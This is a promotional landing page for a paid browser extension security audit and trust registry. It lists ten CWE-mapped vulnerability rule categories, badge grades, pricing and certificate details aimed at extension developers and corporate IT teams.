RegulatorySignals
Browser Extension Trust Registry

Browser Extension Trust Cert — certified in 48 hours

10 extension-specific security rules. Signed trust cert. Public registry listing. Enterprise IT teams use our registry as the source of truth for approved Chrome and Edge AI extensions.

Stanford Browser Extension Security Study (2024): 85% of the top-1,000 Chrome extensions request host-permissions beyond their stated purpose. Enterprise IT has no standardized way to verify an extension is safe — until now.

Submit Your Extension — $299Browse registry →

$499/yr registry listing · Chrome, Edge, Firefox · Badge for your Web Store listing · Prior art: SOC 2, Snyk

Extension Developer

Getting corporate IT inquiries?

When enterprise buyers ask "do you have a security audit?", the Extension Trust Cert is your answer. Put the gold badge on your Chrome Web Store listing. Close the sale.

$299 one-time audit · ships in 48 hours

Corporate IT / Security

Building an extension allowlist?

The Extension Trust Registry gives you an independent, citable security signal for your allowlist change request. Each cert ships with a signed verification JSON endpoint.

Free to search · machine-readable verification JSON

10 extension vulnerability rules

CWE mapped · Chrome Manifest V3 aligned · covers Chrome, Edge, Firefox

ext-001
Host-permission overreachCRITICAL

CWE-272 · Permissions exceed declared purpose

ext-002
DOM injection via message eventsCRITICAL

CWE-79 · Unvalidated postMessage to innerHTML

ext-003
Exfil to non-allowlisted hostsCRITICAL

CWE-200 · Data sent outside declared connect-src

ext-004
unsafe-eval CSP violationHIGH

CWE-116 · eval() or new Function() in extension context

ext-005
Remote code via dynamic script loadingCRITICAL

CWE-94 · Remote JS injected at runtime

ext-006
Dangerous webRequest patternsHIGH

CWE-441 · Request interception with mutation

ext-007
Credentials in localStorageHIGH

CWE-312 · Unencrypted sensitive data at rest

ext-008
Message-passing without origin checkHIGH

CWE-346 · Missing event.origin validation

ext-009
Tab capture without user consentMEDIUM

CWE-352 · Screen/audio capture without visible prompt

ext-010
Update server not Google-hostedMEDIUM

CWE-494 · Self-hosted update_url = supply chain risk

Trust badge grades

Score is calculated from weighted rule findings. Each finding includes remediation guidance.

Gold

90 or above

Zero critical or high findings. Safe for enterprise deployment.

Silver

70 or above

No critical findings. Minor issues documented and tracked.

Bronze

50 or above

Critical findings present but mitigated with documented controls.

None

Below 50

Active critical findings with no mitigation. Listing published without badge.

Frequently asked questions

What does a browser extension security audit cover?

10 rules covering: host-permission overreach beyond stated purpose (ext-001), DOM injection via unvalidated message events (ext-002), data exfiltration to non-allowlisted hosts (ext-003), unsafe-eval CSP violation (ext-004), remote code execution via dynamic script loading (ext-005), dangerous webRequest/declarativeNetRequest patterns (ext-006), credential storage in unencrypted localStorage (ext-007), message-passing without origin validation (ext-008), tab capture without explicit user consent (ext-009), and update server not hosted on Google's update infrastructure (ext-010). Each rule is mapped to a CWE identifier.

How long does the extension audit take?

Static analysis of your extension manifest and source completes in under 15 minutes. You receive a signed certificate JSON and public registry listing within 48 hours after any manual review pass.

What does the trust certificate include?

A tamper-evident HMAC-SHA256 certificate with: extension slug, Chrome Web Store ID (if applicable), version audited, security score (0–100), trust grade (gold/silver/bronze/none), issuance date, expiry date, and a machine-readable endpoint at /api/extension-cert/{slug} for verification by enterprise IT tools.

Why do corporate IT teams require a trust cert?

Stanford's 2024 browser extension security study found that 85% of top-1000 Chrome extensions request host-permissions beyond their stated purpose. IT security teams managing Chrome browser policies have no standardized third-party signal for extension safety — the Extension Trust Cert fills that gap. Each cert includes a signed verification JSON endpoint you can cite in an allowlist change request.

What badge grade will my extension receive?

Gold (score 90 or above): zero critical or high findings. Silver (score 70 or above): no critical findings, minor issues documented. Bronze (score 50 or above): critical findings present but mitigated with documented controls. None (score below 50): active critical findings with no mitigation — listing published without badge.

Corporate IT teams are building allowlists now

Security admins managing Chrome browser policies use our registry when evaluating which AI extensions to approve. Get your extension certified before they finalize the allowlist without you.

Submit Your Extension — $299

Contact [email protected] with your Chrome Web Store URL or GitHub repo.